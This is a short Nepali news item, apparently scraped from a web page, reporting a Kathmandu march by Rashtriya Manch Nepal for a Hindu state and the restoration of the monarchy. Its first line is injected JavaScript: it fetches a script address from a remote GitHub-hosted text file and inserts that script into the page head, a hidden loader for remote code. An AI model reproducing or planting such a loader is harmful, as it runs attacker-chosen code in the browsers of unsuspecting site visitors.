;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
मंसिर २०,
काठमाडौं । बौद्धिक सनातन धर्म सापेक्ष हिन्दु अधिकराज्य एंव राजा सहितको जनतन्त्र पुनर्स्थापको लागि राष्ट्रिय मञ नेपालले आज काठमाडौंमा प्रर्दशन गरेको छ ।
उनीहरुले राजा आउदेशबचाउ भन्दै प्रर्दशन गरेका हुन् । देशका विभिन्न ठाउँमा प्रर्दशन गरेका उनीहरुले शनिबार काठमडौंमा प्रर्दशन गरेका हुन् । माइतीघर मण्डलाबाट सुरु गरिएको शकितप्रदर्शन बानेश्वर पुगेर कोणसभामा परिण हुने स्रोतले बताएको छ ।
प्रर्दशनमा बालकदेखि वयस्क मानिसहरुको समेत सहभागीता रहेको छ ।
फेसबुक प्रतिक्रियाहरु